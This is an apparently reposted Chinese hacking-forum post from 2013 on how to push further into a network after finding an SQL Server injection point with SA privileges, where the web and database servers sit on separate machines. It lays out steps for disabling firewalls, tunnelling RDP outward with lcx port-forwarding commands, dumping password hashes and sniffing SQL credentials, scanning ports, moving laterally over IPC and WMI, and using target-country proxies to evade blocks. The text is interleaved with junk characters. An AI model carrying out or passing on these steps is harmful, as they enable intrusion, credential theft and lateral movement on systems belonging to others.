中国网络渗透测试联盟

标题: SA权限网站和数据库分离的一些思路 [打印本页]

作者: admin    时间: 2013-2-16 21:46
标题: SA权限网站和数据库分离的一些思路
当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。+ h9 A5 y+ I7 Z) p# h# Z* ?0 a

& z4 o, M, ?! i& W9 j/ b/ q# {( z! e$ v# j2 n  F

4 d% G  T, }, N0 W/ `! qSA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)5 j6 B% _, |1 V4 Y1 B, q% p' o# ?
0 X6 ^, @/ d9 J$ T3 j7 ]  \0 f
1 X1 _' ]6 |" u* j* Z& U8 e
一、DB机有公网IP.
/ ]/ b" T% J: x+ T4 R  e, x( |. ?5 z7 H- {4 c2 P1 u
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.* R; m$ u; B! K7 ?+ j

+ D* u0 R9 i4 Z. k: o2 K" u: N5 q% x$ z9 c: h8 t) o9 d
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.  r1 y. O. R8 ]

: _' o) ~# w* T- r$ G2 K2 _- Y, R& ~7 c$ F, d4 P; ?0 q9 K9 I
3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
& ~+ H: F" ]/ r  C& A6 ?9 d: l0 d; C# K
! P' I. q8 q# ^7 ^* |& y
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.* B( _- j9 b, y9 J

6 ]# M; q* b; l6 M$ c( F3 C$ \, B* z9 q

, M$ K. Z/ x+ {2 l二、DB机只有内网IP) d# J0 b1 m6 K' v% c; m6 S: w

. K( U6 @# |) ^4 H4 U! G$ [/ }, ~$ R1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.2 }2 b& m8 g5 }2 t

! M( f' m6 @7 p( L, c+ D) Q
/ P  `1 ?1 J: x8 t  _8 t' k2:停掉防火墙和IP策略再从内往外扫描.# B- c( i: O/ `: J0 R
0 _5 H1 {* ?- q+ \

( ^& T6 G- U+ q$ K; s- \& ?3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.6 V8 ?$ h" ^7 H# _" c4 m
* V4 H9 o( X4 t1 ]* r$ f) d
. R+ `& V: k0 J
4:学会密码规律分析往往会有惊喜.: U* w" i) Z# d3 a. E; W

+ `: L/ `/ t; b) g" O/ W- x$ u; _* j; v) d" `% G, E7 p) |
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等$ [$ [) w. B! P
6 Q# u* v$ p' V- N- }* ]! C

8 _5 |) Y: b! ]% d有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的​




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2